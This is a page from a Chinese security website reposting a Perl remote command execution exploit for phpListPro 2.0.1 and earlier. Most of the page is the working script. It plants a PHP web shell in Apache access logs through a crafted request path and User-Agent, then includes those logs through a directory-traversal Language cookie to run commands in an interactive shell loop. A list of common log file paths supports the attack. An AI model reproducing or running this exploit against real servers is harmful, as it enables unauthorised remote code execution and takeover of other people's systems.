首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpListPro <= 2.0.1 (Language) Remote Code Execution Exploit
来源:http://www.smartisoft.com/ 作者:Oo 发布时间:2006-05-22  

#!/usr/bin/perl
#
# Title: phpListPro <= 2.0.1 Remote Command Execution Exploit
# URL: http://www.smartisoft.com/
#
# Info:
# - arbitrary local inclusion
# - need magic_quotes_gpc=off
#
#

use IO::Socket;
use LWP::Simple;

#ripped from rgod

@apache=(
"/var/log/httpd/access_log%00",
"/var/log/httpd/error_log%00",
"/var/log/apache/error.log%00",
"/var/log/apache/access.log%00",
"/apache/logs/error.log%00",
"/apache/logs/access.log%00",
"/etc/httpd/logs/acces_log%00",
"/etc/httpd/logs/acces.log%00",
"/etc/httpd/logs/error_log%00",
"/etc/httpd/logs/error.log%00",
"/var/www/logs/access_log%00",
"/var/www/logs/access.log%00",
"/usr/local/apache/logs/access_log%00",
"/usr/local/apache/logs/access.log%00",
"/var/log/apache/access_log%00",
"/var/log/apache/access.log%00",
"/var/log/access_log%00",
"/var/www/logs/error_log%00",
"/www/logs/error.log%00",
"/usr/local/apache/logs/error_log%00",
"/usr/local/apache/logs/error.log%00",
"/var/log/apache/error_log%00",
"/var/log/apache/error.log%00",
"/var/log/access_log%00",
"/var/log/error_log%00",
);

print "[i] phpListPro remote command execution exploit\n";
print "[i] Need magic_quotes_gpc=off\n";
print "[i] Coded by [Oo]\n\n";


if (@ARGV < 3)
{
print "[*] Usage: phplistpro_exp.pl [host] [path] [apache_path]\n\n";
print "[*] Apache_Path: \n";
$i = 0;
while($apache[$i])
{
print "[$i] $apache[$i]\n";
$i++;
}
print "\n[*] Exemple: phplistpro_exp.pl 127.0.0.1 /phplistpro/ 1\n";
exit();
}

$serv=$ARGV[0];
$path=$ARGV[1];
$type=$ARGV[2];

print "[+] Injecting some code in log files...\n";
#ripped from rgod
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$serv."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);

print "[+] Ok! Now here the shell, type exit to quit\n";
print "[+] If it's not work maybe try another apache_path...\n\n";

print "[shell] ";
$cmd = <STDIN>;

while($cmd !~ "exit")
{
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n";

print $socket "GET ".$path."config.php HTTP/1.1\r\n";
print $socket "Host: ".$serv."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Cookie: Language=/../../../../../../../../../..".$apache[$type].";cmd=$cmd \r\n";
print $socket "Connection: close\r\n\n";

while ($answer = <$socket>)
{
print $answer;
}

print "[shell] ";
$cmd = <STDIN>;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox <= 1.5.0.3
·IntelliTamper 2.07 (*.map file
·DeluxeBB <= 1.06 (Attachmen
·Woltlab Burning Board <= 2.
·PHP-Fusion <= 6.00.306 (src
·Xoops <= 2.0.13.2 xoopsOpti
·GNUnet <= 0.7.0d (Empty UDP
·Fusion News v.1.0 (fil_config)
·VNC 4.1.1 (VNC Null Authentica
·Cyrus IMAPD 2.3.2 (pop3d) Remo
·DeluxeBB <= 1.06 (name) Rem
·portmap 5 beta (Set/Dump) Loca
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved